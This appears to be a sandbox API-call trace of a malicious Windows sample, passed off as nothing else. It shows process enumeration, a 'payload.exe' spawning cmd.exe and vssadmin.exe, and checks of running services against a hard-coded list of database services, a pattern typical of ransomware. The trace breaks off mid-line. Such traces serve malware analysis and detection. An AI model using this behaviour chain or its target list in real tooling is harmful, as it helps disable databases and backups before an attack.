Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.125] lstrlenW (lpString="services.exe") returned 12 [0053.125] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.126] lstrlenW (lpString="lsass.exe") returned 9 [0053.126] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.126] lstrlenW (lpString="lsm.exe") returned 7 [0053.126] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.127] lstrlenW (lpString="svchost.exe") returned 11 [0053.127] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.128] lstrlenW (lpString="svchost.exe") returned 11 [0053.128] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.128] lstrlenW (lpString="svchost.exe") returned 11 [0053.128] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.129] lstrlenW (lpString="svchost.exe") returned 11 [0053.129] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.130] lstrlenW (lpString="svchost.exe") returned 11 [0053.130] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.131] lstrlenW (lpString="audiodg.exe") returned 11 [0053.131] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.131] lstrlenW (lpString="svchost.exe") returned 11 [0053.131] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.132] lstrlenW (lpString="svchost.exe") returned 11 [0053.132] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.133] lstrlenW (lpString="dwm.exe") returned 7 [0053.133] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.133] lstrlenW (lpString="explorer.exe") returned 12 [0053.133] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.134] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.134] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.135] lstrlenW (lpString="taskhost.exe") returned 12 [0053.135] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.136] lstrlenW (lpString="svchost.exe") returned 11 [0053.136] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.136] lstrlenW (lpString="taskeng.exe") returned 11 [0053.136] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.137] lstrlenW (lpString="taskhost.exe") returned 12 [0053.137] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0053.138] lstrlenW (lpString="carried trinity.exe") returned 19 [0053.138] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0053.138] lstrlenW (lpString="heaven.exe") returned 10 [0053.138] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0053.139] lstrlenW (lpString="dell.exe") returned 8 [0053.139] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0053.140] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0053.140] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0053.140] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0053.140] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0053.141] lstrlenW (lpString="til ear equal.exe") returned 17 [0053.141] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0053.142] lstrlenW (lpString="itunes-bring.exe") returned 16 [0053.142] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0053.142] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0053.142] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0053.143] lstrlenW (lpString="philadelphia.exe") returned 16 [0053.143] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0053.144] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0053.144] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0053.144] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0053.145] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0053.145] lstrlenW (lpString="fraud stuck.exe") returned 15 [0053.145] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0053.146] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0053.146] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0053.147] lstrlenW (lpString="attended.exe") returned 12 [0053.147] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0053.147] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0053.147] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0053.148] lstrlenW (lpString="pan physician.exe") returned 17 [0053.148] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0053.191] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0053.191] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0053.192] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0053.192] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0053.193] lstrlenW (lpString="over-celebrity.exe") returned 18 [0053.193] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.193] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.193] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0053.194] lstrlenW (lpString="payload.exe") returned 11 [0053.194] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.195] lstrlenW (lpString="cmd.exe") returned 7 [0053.195] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.196] lstrlenW (lpString="conhost.exe") returned 11 [0053.196] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0053.197] lstrlenW (lpString="vssadmin.exe") returned 12 [0053.197] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0053.197] lstrlenW (lpString="VSSVC.exe") returned 9 [0053.197] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.198] lstrlenW (lpString="svchost.exe") returned 11 [0053.198] Process32NextW (in: hSnapshot=0x1b4, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.199] CloseHandle (hObject=0x1b4) returned 1 [0053.199] Sleep (dwMilliseconds=0x1f4) [0053.889] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x625d20 [0053.890] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0053.890] GetLastError () returned 0xea [0053.890] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x12c6) returned 0x6c08c8 [0053.891] EnumServicesStatusExW (in: hSCManager=0x625d20, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c08c8, cbBufSize=0x12c6, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c08c8, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0053.891] CloseServiceHandle (hSCObject=0x625d20) returned 1 [0053.892] lstrlenW (lpString="Appinfo") returned 7 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.892] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.892] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.892] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.892] lstrlenW (lpString="AudioSrv") returned 8 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0053.892] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0053.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0053.892] lstrlenW (lpString="BFE") returned 3 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.892] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.892] lstrlenW (lpString="CryptSvc") returned 8 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.892] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.892] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.892] lstrlenW (lpString="CscService") returned 10 [0053.892] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0053.892] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0053.892] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0053.893] lstrlenW (lpString="DcomLaunch") returned 10 [0053.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0053.893] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0053.893] lstrlenW (lpString="Dhcp") returned 4 [0053.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0053.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0053.893] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0053.893] lstrlenW (lpString="Dnscache") returned 8 [0053.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0053.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0053.893] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0053.893] lstrlenW (lpString="DPS") returned 3 [0053.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0053.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0053.893] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0053.893] lstrlenW (lpString="eventlog") returned 8 [0053.893] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0053.893] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0053.893] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0053.893] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0053.893] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0053.893] lstrlenW (lpString="EventSystem") returned 11 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0053.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0053.894] lstrlenW (lpString="gpsvc") returned 5 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0053.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0053.894] lstrlenW (lpString="iphlpsvc") returned 8 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0053.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0053.894] lstrlenW (lpString="LanmanServer") returned 12 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0053.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0053.894] lstrlenW (lpString="LanmanWorkstation") returned 17 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0053.894] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0053.894] lstrlenW (lpString="lmhosts") returned 7 [0053.894] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0053.894] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0053.894] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0053.894] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0053.895] lstrlenW (lpString="MMCSS") returned 5 [0053.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0053.895] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0053.895] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0053.895] lstrlenW (lpString="MpsSvc") returned 6 [0053.895] 